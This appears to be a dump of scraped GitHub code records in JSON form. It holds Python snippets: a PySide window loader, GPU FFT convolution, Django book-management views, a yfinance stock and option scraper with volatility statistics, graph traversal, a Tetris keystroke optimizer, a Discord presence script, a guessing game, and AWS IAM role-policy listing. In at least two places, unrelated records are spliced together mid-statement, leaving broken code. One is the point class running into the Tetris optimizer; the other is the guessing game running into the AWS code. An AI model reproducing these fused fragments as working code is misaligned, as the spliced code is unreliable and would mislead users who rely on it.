attempts)\n\nmodule_functions.moduleNotesDump(serial_num)\n\nmodule_functions.export_to_xml(serial_num, card_id)\n\nbase.bottom()\n","repo_name":"yw5mj/hcaltsbackup","sub_path":"cgi-bin/ePortage/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"37999210198","text":"import sys\nfrom PySide6.QtCore import QFile, QIODevice\nfrom PySide6.QtUiTools import QUiLoader\nfrom PySide6.QtWidgets import QMainWindow\n\n\nclass Window(QMainWindow):\n    def __init__(self):\n        super().__init__()\n\n    def windowInit(self, uiFileName, where=None):\n        uiFile = QFile(uiFileName)\n        if not uiFile.open(QIODevice.ReadOnly):\n            print(f\"Cannot open {uiFileName}: {uiFile.errorString()}\")\n            sys.exit(-1)\n        loader = QUiLoader()\n        window = loader.load(uiFile, where)\n        uiFile.close()\n        if not window:\n            print(loader.errorString())\n            sys.exit(-1)\n        
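# show the loaded top-level widget and hand it back to the caller\n        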
window.show()\n        return window\n","repo_name":"srafique98/SWEProject","sub_path":"src/Window.py","file_name":"Window.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"13743109156","text":"import cupy as cp\nimport cupyx.scipy.fft as cufft\nimport numpy as np\nimport time\n\n\nsize = 10000\nsignal = np.random.rand(size, size)\nkernel = np.random.rand(size, size)\nstart_time = time.time()\n# move the data to GPU memory\nsignal_gpu = cp.asarray(signal)\nkernel_gpu = cp.asarray(kernel)\n\n# zero-pad the kernel array so it has the same size as the signal array\npadded_kernel_gpu = cp.pad(kernel_gpu, ((0, signal.shape[0] - kernel.shape[0]), \n                                       (0, signal.shape[1] - kernel.shape[1])), mode='constant')\nkernel_freq_gpu = cufft.fftn(padded_kernel_gpu)\n\n\n# run the Fourier transform on the GPU\nsignal_freq_gpu = cufft.fftn(signal_gpu)\n\n# point-wise multiplication on the GPU\nproduct_freq_gpu = signal_freq_gpu * kernel_freq_gpu\n\n# run the inverse Fourier transform on the GPU\nproduct_gpu = cufft.ifftn(product_freq_gpu)\nend_time = time.time()\nfft_conv_time = end_time - start_time\n# move the result back to host memory\nproduct = cp.asnumpy(product_gpu)\n\n# report the result\nprint(f\"GPU FFT time: {fft_conv_time:.6f} seconds\")","repo_name":"Ben0126/Matlab_call_Python_conv2D","sub_path":"gpu_fft_YJ.py","file_name":"gpu_fft_YJ.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"11612346532","text":"from django.shortcuts import render, HttpResponse, redirect\nimport json\nfrom django.core import serializers\n\n\nfrom bms.models import *\n\n\ndef test(request):\n\n    a = Books.objects.filter(id=9)\n    print(a)\n    return HttpResponse('OK')\n\n\ndef show(request):\n    books = []\n    book_list = Books.objects.all()\n    for item in book_list:\n        dist = {}\n        author = ''\n        bk = Books.objects.filter(id=item.id).first()\n        publish = bk.publishb.pname\n        authors = bk.authors.all()\n        for i in authors:\n            author += (i.aname+',')\n        dist['id'] = item.id\n        dist['title'] = item.title\n        dist['price'] = item.price\n        dist['pub_date'] = item.pub_date\n        dist['publish'] = publish\n        dist['author'] = author[:-1]\n\n        books.append(dist)\n\n    return render(request, 'bms/show_book_bases.html', {'books': books,})\n\n\ndef add(request):\n\n    if request.method == 'POST':\n        title = request.POST.get('title')\n        pub_date = request.POST.get('pub_date')\n        price = request.POST.get('price')\n        pub = Publish.objects.filter(pname=request.POST.getlist('publish')[0]).first()\n        book = Books.objects.create(title=title, pub_date=pub_date, price=price, publishb_id=pub.pid)\n        author_l = request.POST.getlist('author')\n        for i in author_l:\n            aid = i.split(':')[1]\n            author = Authors.objects.filter(aid=aid).first()\n            book.authors.add(author)\n\n        return redirect('/bms/show')\n    else:\n        \n        publish = Publish.objects.all()\n        author = Authors.objects.all()\n        \n        return render(request, 'bms/add_books.html', {'publish': publish, 'authors': author})\n\n\ndef delete(request, b_id):\n\n    Books.objects.filter(id=b_id).delete()\n\n    return redirect('/bms/show/')\n\n\ndef change(request):\n\n    if request.method == 'POST':\n\n        data = json.loads(request.body)\n\n        b_id = data.get('book_id')\n        pub_date = data.get('pub_date')\n        price = data.get('price')\n        pub = Publish.objects.filter(pname=data.get('pubs')[0]).first()\n        Books.objects.filter(id=b_id).update(title=data.get('title'), pub_date=pub_date, price=price, publishb_id=pub.pid)\n        author_l = data.get('author')\n        book = Books.objects.filter(id=b_id).first()\n        book.authors.clear()\n        for i in author_l:\n            aid = i.split(':')[1]\n            
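# look up each submitted author by primary key and attach it to the book\n            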
author = Authors.objects.filter(aid=aid).first()\n book.authors.add(author)\n\n return HttpResponse('OK')\n\n return redirect('/bms/show/')\n\n\ndef book_msg(request):\n\n book_id = request.GET.get('book_id')\n\n ret = {}\n a_id = []\n publish = serializers.serialize('json', Publish.objects.all())\n author = serializers.serialize('json', Authors.objects.all())\n book = Books.objects.filter(id=book_id).first()\n pname = book.publishb.pname\n au = book.authors.all()\n\n for i in au:\n a_id.append(i.aid)\n\n ret['publish'] = publish\n ret['author'] = author\n ret['a_id'] = a_id\n ret['pname'] = pname\n ret['book'] = serializers.serialize('json', Books.objects.filter(id=book_id))\n\n return HttpResponse(json.dumps(ret))","repo_name":"summer5625/Mygit","sub_path":"第六模块_WEB框架/Django框架/mBMS/bms/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38285275644","text":"import yfinance as yf\nimport pandas as pd\nimport os\nimport copy\nimport pytz\nimport json\nimport math\n\nfrom statsmodels.graphics.tsaplots import plot_acf\n\nimport matplotlib.pyplot as plt\n\nfrom json import JSONEncoder\nfrom datetime import datetime\nfrom time import sleep\nfrom pathlib import Path\n\n#############################\n# Helper functions\n\nclass StockEncoder(JSONEncoder):\n\tdef default(self, obj):\n\t\tif isinstance(obj, Stock):\n\t\t\treturn stock_as_dict(obj)\n\t\t# If not handled, return default\n\t\treturn JSONEncoder.default(self,obj)\n\nclass DownloaderEncoder(JSONEncoder):\n\tdef default(self, obj):\n\t\tif isinstance(obj, Downloader):\n\t\t\toutput_dict = {}\n\t\t\tfor s in obj.stock_list:\n\t\t\t\ttemp_json = stock_as_dict(s)\n\t\t\t\toutput_dict[s.ticker] = temp_json\n\t\t\treturn output_dict\n\t\treturn JSONEncoder.default(self, obj)\n\ndef as_stock(dict):\n\t# No error handling at the moment\n\tstock_list = []\n\tfor k1, v1 in dict.items():\n\t\tprint(\"Creating new stock object for: \" + v1[\"ticker\"])\n\t\tstock_list.append(Stock.from_dict(v1))\n\treturn stock_list\n\ndef stock_as_dict(obj):\n\toutput_dict = {}\n\toutput_dict[\"ticker\"] = obj.ticker\n\toutput_dict[\"data_endpoint\"] = obj.data_endpoint\n\toutput_dict[\"datetime_run\"] = obj.datetime_run\n\t\n\toutput_dict[\"stock_price_history\"] = obj.stock_price_history.to_json()\n\n\toption_chain_list = []\n\tfor it in obj.option_chains:\n\t\toption_chain_list.append(it.to_json())\n\n\toutput_dict[\"option_chains\"] = option_chain_list \n\treturn output_dict\n\n###############################\n\nclass Downloader:\n\tdef __init__(self, ticker_list_name):\n\t\tself.ticker_list_name = ticker_list_name\n\t\tself.ticker_list_path = os.path.join(os.getcwd(), 'tickers.txt')\n\t\tself.ticker_list = []\n\t\tself.stock_list = []\n\n\tdef read_tickers(self):\n\t\twith open(self.ticker_list_path) as f:\n\t\t\tfinished = False\n\t\t\tticker_list_temp = []\n\n\t\t\twhile (finished == False):\n\t\t\t\tline = f.readline()\n\n\t\t\t\t# EOF\n\t\t\t\tif len(line) == 0:\n\t\t\t\t\tfinished = True\n\t\t\t\t\tbreak\n\t\t\t\t\n\t\t\t\tline = line.rstrip('\\n')\n\t\t\t\t# Found a new set of tickers\n\t\t\t\tif line.find(\"#\") > -1:\n\t\t\t\t\t# Check if we are at the list of tickers we want to be\n\t\t\t\t\tif line.replace(\"#\", \"\") == self.ticker_list_name:\n\t\t\t\t\t\t# Read until end of section reached ('#')\n\t\t\t\t\t\twhile (True):\n\t\t\t\t\t\t\tsection_line = f.readline().rstrip('\\n') \n\t\t\t\t\t\t\tif (section_line == 
\"#\"):\n\t\t\t\t\t\t\t\tfinished = True\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\tticker_list_temp.append(section_line)\n\t\t\tself.ticker_list = copy.deepcopy(ticker_list_temp)\n\t\n\tdef download_stock_data(self, start_dt=None, end_dt=None):\n\t\tfor s in self.stock_list:\n\t\t\tprint(\"Downloading stock data for \" + s.ticker + \" with start_dt \" + str(start_dt) + \" and end_dt \" + str(end_dt))\n\t\t\ts.download_stock_price_data(start_dt, end_dt)\n\n\tdef download_options_data(self):\n\t\tfor s in self.stock_list:\n\t\t\tprint(\"Downloading options data for \" + s.ticker + \".\")\n\t\t\ts.download_options_data()\n\n\tdef build_stock_objects(self):\n\t\tif (len(self.ticker_list) == 0):\n\t\t\tprint('Ticker list is empty.')\n\t\tfor t in self.ticker_list:\n\t\t\tself.stock_list.append(Stock(t))\n\n\tdef initialize(self):\n\t\tself.read_tickers()\n\t\tself.build_stock_objects()\n\n\nclass OptionChain:\n\tdef __init__(self, ticker, date, calls=None, puts=None, updated_time=None):\n\t\tself.ticker = ticker\n\t\tself.date = date\n\t\tself.calls = calls\n\t\tself.puts = puts\n\t\tself.updated_time = updated_time\n\n\tdef to_json(self):\n\t\toutput_dict = {}\n\t\toutput_dict[\"ticker\"] = self.ticker\n\t\toutput_dict[\"date\"] = self.date\n\t\toutput_dict[\"calls\"] = self.calls.to_json() if self.calls is not None else None\n\t\toutput_dict[\"puts\"] = self.puts.to_json() if self.puts is not None else None\n\t\toutput_dict[\"updated_time\"] = self.updated_time\n\t\treturn output_dict\n\t\n\t@classmethod\n\tdef from_dict(cls, dict):\n\t\tticker = dict[\"ticker\"]\n\t\tdate = dict[\"date\"]\n\t\t#calls = pd.read_json(dict[\"calls\"]) if dict[\"calls\"] is not None else None\n\t\t#puts = pd.read_json(dict[\"puts\"]) if dict[\"puts\"] is not None else None\n\t\tcalls = pd.read_json(dict[\"calls\"]).set_index(\"contractSymbol\", drop=True, inplace=False).rename_axis(\"contractSymbol\") if dict[\"calls\"] is not None else None\n\t\tputs = pd.read_json(dict[\"puts\"]).set_index(\"contractSymbol\", drop=True, inplace=False).rename_axis(\"contractSymbol\") if dict[\"puts\"] is not None else None\n\t\tupdated_time = dict[\"updated_time\"]\n\t\treturn OptionChain(ticker, date, calls, puts, updated_time)\n\nclass Stock:\n\tdef __init__(self, ticker, datetime_run=None, data_endpoint=\"yfinance\"):\n\t\tself.ticker = ticker\n\t\tself.stock_price_history = pd.DataFrame()\n\t\tself.option_chains = []\n\t\tself.yfinance_ticker_object = None\n\t\tself.data_endpoint = data_endpoint\n\t\tself.datetime_run = datetime_run\n\n\t\tself.update_object_based_on_data_endpoint()\n\n\t@classmethod\n\tdef from_dict(cls, dict):\n\t\ts = cls(dict[\"ticker\"], dict[\"datetime_run\"], dict[\"data_endpoint\"])\n\n\t\ts.stock_price_history = pd.read_json(dict[\"stock_price_history\"]) if \"stock_price_history\" in dict else None\n\n\t\toption_chain_list = dict[\"option_chains\"] if \"option_chains\" in dict else []\n\t\tfor chain in option_chain_list:\n\t\t\ts.option_chains.append(OptionChain.from_dict(chain))\n\t\treturn s\n\n\tdef get_last_close_price(self):\n\t\tif self.stock_price_history.empty is True:\n\t\t\treturn \"Stock price history not initialized.\"\n\t\treturn self.stock_price_history.tail(1)[\"Close\"][0]\n\n\tdef download_stock_price_data(self, start_dt=None, end_dt=None):\n\t\tself.stock_price_history = self.yfinance_ticker_object.history(start=start_dt, end=end_dt)\n\n\tdef get_option_chains_merged(self, format=\"dataframe\"):\n\t\tif not self.option_chains:\n\t\t\treturn None\n\n\t\tif 
format == \"dataframe\":\n\t\t\t# Transform the option chains into one dataframe\n\t\t\t\n\t\t\t# Fix this, stupid [0] reference\n\t\t\tcolumns = self.option_chains[0].calls.columns.to_list() + [\"type\", \"updated_time_dt\", \"updated_time_hours\"]\n\t\t\t#columns = self.calls.columns.to_list()\n\t\t\toutput_df = pd.DataFrame(columns=columns)\n\n\t\t\t# Fix this, stupid [0] reference\n\t\t\tcalls_df = pd.DataFrame(columns=self.option_chains[0].calls.columns.to_list())\n\t\t\tputs_df = pd.DataFrame(columns=self.option_chains[0].puts.columns.to_list())\n\n\t\t\tfor c in self.option_chains:\n\t\t\t\tupdate_time_temp = c.updated_time.split(\" \")\n\n\t\t\t\tcalls_df = calls_df.append(c.calls)\n\t\t\t\tcalls_df[\"type\"] = \"call\"\n\t\t\t\tcalls_df[\"updated_time_dt\"] = update_time_temp[0]\n\t\t\t\tcalls_df[\"updated_time_hours\"] = update_time_temp[1]\n\n\t\t\t\tputs_df = puts_df.append(c.puts)\n\t\t\t\tputs_df[\"type\"] = \"put\"\n\t\t\t\tputs_df[\"updated_time_dt\"] = update_time_temp[0]\n\t\t\t\tputs_df[\"updated_time_hours\"] = update_time_temp[1]\n\n\t\t\toutput_df = output_df.append(calls_df)\n\t\t\toutput_df = output_df.append(puts_df)\n\t\t\toutput_df[\"expiration_date\"] = output_df.apply(lambda row: self._get_expiration_date_helper(row.name), axis=1)\n\n\t\t\treturn output_df.fillna(0)\n\n\tdef _get_expiration_date_helper(self, input):\n\t\toffset = len(self.ticker)\n\t\tyear = \"20\" + input[offset+0:offset+2]\n\t\tmonth = input[offset+2:offset+4]\n\t\tday = input[offset+4:offset+6]\n\t\t\n\t\treturn year + \"-\" + month + \"-\" + day\n\t\t#[len(self.ticker):len(self.ticker)+6]\n\n\n\tdef update_object_based_on_data_endpoint(self):\n\t\tif (self.data_endpoint == \"yfinance\"):\n\t\t\tself.yfinance_ticker_object = yf.Ticker(self.ticker)\n\t\telse:\n\t\t\tself.yfinance_ticker_object = None\n\n\tdef download_options_data(self):\n\t\tif self.data_endpoint == \"yfinance\":\n\t\t\tself.datetime_run = datetime.now().strftime(\"%Y-%m-%d %H-%M\")\n\t\t\ttry:\n\t\t\t\t# No error handling in yfinance package, hence this\n\t\t\t\texpirations = self.yfinance_ticker_object.options\n\t\t\t\tfor date in expirations:\n\t\t\t\t\tprint(\"Downloading options data for: \" + self.ticker + \" with date \" + date)\n\t\t\t\t\ttry:\n\t\t\t\t\t\tcurrent_option = self.yfinance_ticker_object.option_chain(date)\n\t\t\t\t\t\tself.option_chains.append(OptionChain(self.yfinance_ticker_object.ticker, date, current_option.calls, current_option.puts, datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")))\n\t\t\t\t\texcept:\n\t\t\t\t\t\tprint(\"Exception found with previous request, see above line.\")\n\t\t\t\t\t\tself.option_chains.append(OptionChain(self.yfinance_ticker_object.ticker, date, None, None, datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")))\n\t\t\texcept:\n\t\t\t\tprint(\"No option chains found for this ticker.\")\n\t\n\tdef as_string(self, delimiter=','):\n\t\tdata = self.__dict__\n\t\toutput_str = \"\"\n\t\tfor key, value in data.items():\n\t\t\t# This should be implemented recursively to account for arbitrary data structures\n\t\t\tif (isinstance(value, list) == True):\n\t\t\t\tfor it1 in value:\n\t\t\t\t\tfor k1, v1 in value.__dict__.items():\n\t\t\t\t\t\toutput_str = output_str + delimiter + str(v1)\n\t\t\telse:\n\t\t\t\toutput_str = output_str + delimiter + str(value)\n\t\treturn output_str.replace(delimiter, \"\", 1) # remove first delimiter\n\tdef make_json(self):\n\t\t\t# TODO: Write custom encoder\n\t\t\t# especially problematic: isinstance(n.option_chains[0].calls, pd.DataFrame)\n\t\t\treturn 
json.dumps(self, default=lambda o: o.to_json(), sort_keys=True)\n\ndef double_result_decorator(f):\n\tdef wrapper(*args):\n\t\tvalue = f(*args)\n\t\treturn round(value * 100, 2)\n\n\treturn wrapper\n\nclass CorrelationModule:\n\t# The purpose of this module is to calculate anything related to cross correlations of time-series\n\tdef __init__(self):\n\t\tself.df = None\n\n\tdef get_cross_correlation(self):\n\t\t# between explicit columns or all\n\t\treturn self.df.corr()\n\n\tdef get_most_correlated_series(self):\n\t\t# between a given column and the rest of the data, which are the most correlated series\n\t\tpass\n\nclass DataObject:\n\t# Manages the data of the current workspace\n\tdef __init__(self):\n\t\tpass\n\nclass Volatility:\n\tdef __init__(self, series, series_data_field=\"close\", type=\"daily\"):\n\t\t# Assumes DF with index as a date or something that can be ordered\n\t\t# Input must be a dataframe with index of something to be sorted, the value with the 'series_name'\n\t\tself.time_series_daily = series.copy(deep=True)\n\t\tself.time_series_monthly = None\n\t\tself.series_data_field = series_data_field\n\t\tself.type = type\n\n\t\tself._initialize()\n\n\tdef _initialize(self):\n\t\tself.time_series_daily[\"tomorrows_close\"] = self.time_series_daily[self.series_data_field].shift(-1)\n\t\t\n\t\tself.time_series_daily[\"change\"] = self.time_series_daily.apply(lambda row: (row[\"tomorrows_close\"] - row[self.series_data_field]) / row[self.series_data_field], axis=1 )\n\t\tself.time_series_daily[\"change_log\"] = self.time_series_daily.apply(lambda row: math.log(row[\"tomorrows_close\"] / row[self.series_data_field]), axis=1 )\n\t\t\n\t\tself.time_series_daily.drop([\"tomorrows_close\"], inplace=True, axis=1)\n\t\tself.time_series_daily.dropna(inplace=True)\n\t\t\n\t\tif self.type == \"daily\":\n\t\t\ttemp_monthly_df = self.time_series_daily.copy(deep=True)\n\t\t\ttemp_monthly_df[\"is_month_end\"] = temp_monthly_df.index.is_month_end\n\t\t\tself.time_series_monthly = temp_monthly_df[temp_monthly_df.is_month_end == True]\n\t\t\tself.time_series_monthly[\"next_months_close\"] = self.time_series_monthly.shift(-1)\n\t\t\tself.time_series_monthly[\"monthly_change\"] = self.time_series_monthly.apply(lambda row: (row[\"next_months_close\"] - row[self.series_data_field]) / row[self.series_data_field], axis=1 )\n\t\t\tself.time_series_monthly.drop([\"next_months_close\"], inplace=True, axis=1)\n\t\t\tself.time_series_monthly.dropna(inplace=True)\n\t\n\t@double_result_decorator\n\tdef get_annualized(self, last_days=None):\n\t\t# Assumes that price_history is by day\n\t\tif last_days == None:\n\t\t\treturn self.time_series_daily[\"change\"].std() * math.sqrt(252)\n\t\t\n\t\t# Return the annualized volatility based on last_days number of days.\n\t\t# Assumes the data is sorted ascending\n\t\treturn self.time_series_daily.tail(last_days)[\"change\"].std() * math.sqrt(252)\n\t\n\t@double_result_decorator\n\tdef get_daily(self, last_days=None):\n\t\tif last_days == None:\n\t\t\treturn self.time_series_daily[\"change\"].std()\n\t\t\n\t\treturn self.time_series_daily.tail(last_days)[\"change\"].std()\n\n\t@double_result_decorator\n\tdef get_monthly(self, last_periods=None, daily_scaled=True):\n\t\tif daily_scaled == True:\n\t\t\t# Assumes that price_history is by day\n\t\t\t# Assumes 21 trading days\n\n\t\t\tif last_periods == None:\n\t\t\t\treturn self.time_series_daily[\"change\"].std() * math.sqrt(21)\n\t\t\n\t\t\t# Return the monthly volatility based on the last last_periods days. 
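(The sqrt(21) factor scales daily volatility to a ~21-trading-day month.)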
\n\t\t\t# Assumes the data is sorted ascending\n\t\t\treturn self.time_series_daily.tail(last_periods)[\"change\"].std() * math.sqrt(21)\n\t\t\n\t\tif last_periods == None:\n\t\t\treturn self.time_series_monthly[\"monthly_change\"].std()\n\t\treturn self.time_series_monthly[\"monthly_change\"].tail(last_periods).std()\n\t\n\t@double_result_decorator\n\tdef get_weekly(self, last_days=None):\n\t\t# Assumes that price_history is by day\n\t\t# Assumes 5 trading days\n\n\t\tif last_days == None:\n\t\t\treturn self.time_series_daily[\"change\"].std() * math.sqrt(5)\n\t\t\n\t\t# Return the weekly volatility based on the last last_days days.\n\t\t# Assumes the data is sorted ascending\n\t\treturn self.time_series_daily.tail(last_days)[\"change\"].std() * math.sqrt(5)\n\n\t@double_result_decorator\n\tdef get_realized_volatility(self, period_type, periods, roll_period=0):\n\t\t# daily, weekly, monthly, rolling\n\t\tif period_type == 'daily':\n\t\t\treturn self.time_series_daily.tail(periods)[\"change\"].std()\n\n\t\tif period_type == 'weekly':\n\t\t\treturn None\n\n\t\tif period_type == 'monthly':\n\t\t\treturn self.time_series_monthly.tail(periods)[\"monthly_change\"].std()\n\t\n\t\tif period_type == 'rolling':\n\t\t\treturn self.time_series_daily.rolling(roll_period).std()\n\n\tdef plot_realized_volatility(self, period_type, roll_periods):\n\t\t# params: \n\t\t#\t'period_type' : string, 'rolling'\n\t\t#\t'roll_periods' : list of numbers, '[5, 20, 60]'\n\t\tif period_type == 'rolling':\n\t\t\tfor p in roll_periods:\n\t\t\t\tplt.plot(self.time_series_daily[self.series_data_field].rolling(p).std(), label=str(p))\n\t\t\tplt.legend()\n\t\t\tplt.show()\n\n\tdef get_mean(self):\n\t\tpass\n\n\tdef get_moving_average(self):\n\t\tpass\n\n\tdef plot_acf(self):\n\t\tplot_acf(self.time_series_daily[\"change\"])\n\t\tplt.show()\n\n\tdef plot_histogram(self, bins=250, log=False):\n\t\tif log is False:\n\t\t\tself.time_series_daily.hist(column=\"change\", bins=bins)\n\t\telse:\n\t\t\tself.time_series_daily.hist(column=\"change_log\", bins=bins)\n\t\tplt.show()\n\n\tdef get_return_descriptive_statistics(self, number_of_periods=None):\n\t\t# mean, mode, std, kurtosis, skewness\n\t\tprint(\"Mean: \" + str(self.time_series_daily[\"change\"].mean()))\n\t\tprint(\"Median: \" + str(self.time_series_daily[\"change\"].median()))\n\t\tprint(\"Mode: \" + str(self.time_series_daily[\"change\"].mode()))\n\t\tprint(\"Std: \" + str(self.time_series_daily[\"change\"].std()))\n\t\tprint(\"Kurtosis: \" + str(self.time_series_daily[\"change\"].kurt()))\n\t\tprint(\"Skew: \" + str(self.time_series_daily[\"change\"].skew()))\n\t\t\n\n\tdef plot(self):\n\t\tpass","repo_name":"orentola/stock-and-option-price-scraper","sub_path":"stock-and-option-price-scraper/stockmodule/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":14407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"70212815205","text":"import sys\r\nfrom collections import defaultdict, deque\r\n\r\n\r\nclass Graph:\r\n    def __init__(self) -> None:\r\n        self.N: int\r\n        self.M: int\r\n        self.V: int\r\n        self.graph: defaultdict[int, list[int]] = defaultdict(list)\r\n        self.get_info()\r\n\r\n    def get_info(self) -> None:\r\n        self.N, self.M, self.V = map(int, input().split())\r\n        for _ in range(self.M):\r\n            u, v = map(int, input().split())\r\n            self.graph[u].append(v)\r\n            self.graph[v].append(u)\r\n\r\n    def DFS(self) -> list[int]:\r\n        stack = [self.V]\r\n        ans: list[int] = []\r\n        for value in 
self.graph.values():\r\n value.sort(reverse=True)\r\n checked: set[int] = set()\r\n while stack:\r\n u = stack.pop()\r\n if u in checked:\r\n continue\r\n ans.append(u)\r\n checked.add(u)\r\n stack.extend(self.graph[u])\r\n return ans\r\n\r\n def BFS(self) -> list[int]:\r\n Q = deque([self.V])\r\n ans: list[int] = []\r\n for value in self.graph.values():\r\n value.sort()\r\n checked: set[int] = set()\r\n while Q:\r\n u = Q.popleft()\r\n if u in checked:\r\n continue\r\n ans.append(u)\r\n checked.add(u)\r\n Q.extend(self.graph[u])\r\n return ans\r\n\r\n\r\ndef main():\r\n graph = Graph()\r\n print(*graph.DFS())\r\n print(*graph.BFS())\r\n\r\n\r\nif __name__ == '__main__':\r\n input = sys.stdin.readline\r\n main()\r\n","repo_name":"SeungWoo-You/PS","sub_path":"백준/Silver/1260. DFS와 BFS/DFS와 BFS.py","file_name":"DFS와 BFS.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72819361446","text":"class point:\n def __init__(self,x=0,y=0):\n self.x=x\n self.y=y\n def __str__(self):\n return \"({0},{1})\".format(self.x,self.y)\n def __lt__(self, other):\n self_call=(self.x**2)+(self.y**2)\n other_call=(other.x**2)+(other.y**2)\n return (self_call 0\n return drops[0]\n\n @staticmethod\n def get_keystrokes(rotation, column, keymap, tetromino):\n keys = []\n # First we orient the tetronimo\n if rotation == 1:\n keys.append(keymap['rotate_right'])\n elif rotation == 2:\n keys.append(keymap['rotate_right'])\n keys.append(keymap['rotate_right'])\n elif rotation == 3:\n keys.append(keymap['rotate_left'])\n # Then we move it all the way to the the left that we are guaranteed\n # that it is at column 0. The main reason for doing this is that when\n # the tetromino is rotated, the bottom-leftmost piece in the tetromino\n # may not be in the 3rd column due to the way Tetris rotates the piece\n # about a specific point. There are too many edge cases so instead of\n # implementing tetromino rotation on the board, it's easier to just\n # flush all the pieces to the left after orienting them.\n #for i in range(4):\n # keys.append(keymap['move_left'])\n # Now we can move it back to the correct column. 
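The DFS above reverse-sorts each adjacency list so that, popped from a LIFO stack, the smallest-numbered neighbour is visited first, while BFS sorts ascending for its FIFO queue. The stack mechanics in isolation, on a hypothetical four-vertex graph:

# Stack-based DFS that visits smaller neighbours first.
graph = {1: [2, 3, 4], 2: [1, 4], 3: [1, 4], 4: [1, 2, 3]}
for adj in graph.values():
    adj.sort(reverse=True)  # largest pushed first => smallest popped first

stack, seen, order = [1], set(), []
while stack:
    u = stack.pop()
    if u in seen:
        continue
    seen.add(u)
    order.append(u)
    stack.extend(graph[u])
print(order)  # [1, 2, 4, 3]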
Since pyautogui's\n # typewrite is instantaneous, we don't have to worry about the delay\n # from moving it all the way to the left.\n print(str(column) + \" : \" + tetromino + \" : \" + str(rotation))\n if column == 4 and tetromino == \"s\":\n pass\n if column == 3 and tetromino == \"t\":\n pass\n elif column == 5 and tetromino != \"i\" and tetromino != \"j\" and tetromino != \"s\" and tetromino != \"t\" and tetromino != \"z\" and tetromino != \"o\" and tetromino != \"l\":\n pass\n elif column < 4:\n if rotation == 1:\n if tetromino == \"i\":\n for i in range(column - 5):\n keys.append(keymap['move_right'])\n if tetromino == \"s\":\n for i in range(4 - column):\n keys.append(keymap['move_left'])\n else:\n for i in range(4 - column):\n keys.append(keymap['move_left'])\n else:\n for i in range(3 - column):\n keys.append(keymap['move_left'])\n\n if tetromino == \"o\":\n keys.append(keymap['move_left'])\n pass\n else:\n if rotation == 1 or rotation == 3:\n if tetromino == \"i\":\n for i in range(column - 5):\n keys.append(keymap['move_right'])\n if tetromino == \"s\" or tetromino == \"t\" or tetromino == \"z\":\n for i in range(column - 4):\n keys.append(keymap['move_right'])\n else:\n for i in range(column - 3):\n keys.append(keymap['move_right'])\n else:\n if tetromino == \"z\" or tetromino == \"s\" or tetromino == \"t\" or tetromino == \"i\" or tetromino == \"j\" or tetromino == \"i\" or tetromino == \"l\":\n for i in range(column - 3):\n keys.append(keymap['move_right'])\n else:\n for i in range(column - 4):\n keys.append(keymap['move_right'])\n pass\n\n keys.append(keymap['drop'])\n return keys\n\nif __name__ == '__main__':\n f = Field()\n f.drop(Tetromino.TTetromino(), 3)\n opt = Optimizer.get_optimal_drop(\n f['tetromino_rotation'], f['tetromino_column'], Tetromino.ITetromino())\n print(opt['field'])\n","repo_name":"Swofty-Developments/JStris-Python-Bot","sub_path":"optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":5446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"69877709604","text":"# https://pypi.org/project/discord-rpc/\n\nimport DiscordRPC\nimport time\n\nrpc = DiscordRPC.RPC.Set_ID(app_id=975275670345228358)\n\nrpc.set_activity(\n state=\"Spotify App\",\n details=\"Driving on the I-95\",\n large_image=\"android_auto_logo\",\n small_image=\"spotify_app_logo_svg\",\n timestamp=time.time()\n )\n\nrpc.run()","repo_name":"AstridWasHereLOL/Python-test-stuff","sub_path":"discord-rpc.py","file_name":"discord-rpc.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"7401851111","text":"from random import randint\n\nwhile True:\n rand = randint(1,100)\n print('I am thinking of a number between 1 and 100.')\n for i in range(10,0,-1):\n print(f'You have {i} guesses left. 
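The keystroke builder above encodes the move count for every tetromino and rotation as special cases; the underlying idea is just translating a horizontal offset into repeated key presses. A generic sketch — the keymap values and the spawn column here are placeholders, not the game's real ones:

# Turning a target column into a key sequence (placeholder keymap/spawn column).
keymap = {"move_left": "a", "move_right": "d", "drop": "s"}
spawn_col, target_col = 3, 6

step = "move_right" if target_col > spawn_col else "move_left"
keys = [keymap[step]] * abs(target_col - spawn_col)
keys.append(keymap["drop"])
print(keys)  # ['d', 'd', 'd', 's']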
Take a guess.')\n while True:\n try:\n n = int(input('>'))\n except ValueError:\n continue\n break\n if n>rand:\n print('Your guess is too high.')\n elif n List[str]:\n \"\"\" Retrieve a list of role names by paginating over list_roles() calls \"\"\"\n roles = []\n role_paginator = client.get_paginator('list_roles')\n for response in role_paginator.paginate():\n response_role_names = [r.get('RoleName') for r in response['Roles']]\n roles.extend(response_role_names)\n return roles\n\ndef get_attached_policies_for_roles(role_names: List[str]) -> Dict[str, List[Dict[str, str]]]:\n \"\"\" Create a mapping of role names and any policies they have attached to them by \n paginating over list_attached_role_policies() calls for each role name. \n Attached policies will include policy name and ARN.\n \"\"\"\n policy_map = {}\n policy_paginator = client.get_paginator('list_attached_role_policies')\n for name in role_names:\n print(name)\n if name.startswith('alpha_'):\n role_policies = []\n for response in policy_paginator.paginate(RoleName=name):\n print(\"Role: {0}\\n Policy: {1}\\n\".format(name,response.get('AttachedPolicies')))\n role_policies.extend(response.get('AttachedPolicies'))\n policy_map.update({name: role_policies})\n return policy_map\n\ndef get_policies_for_roles(role_names: 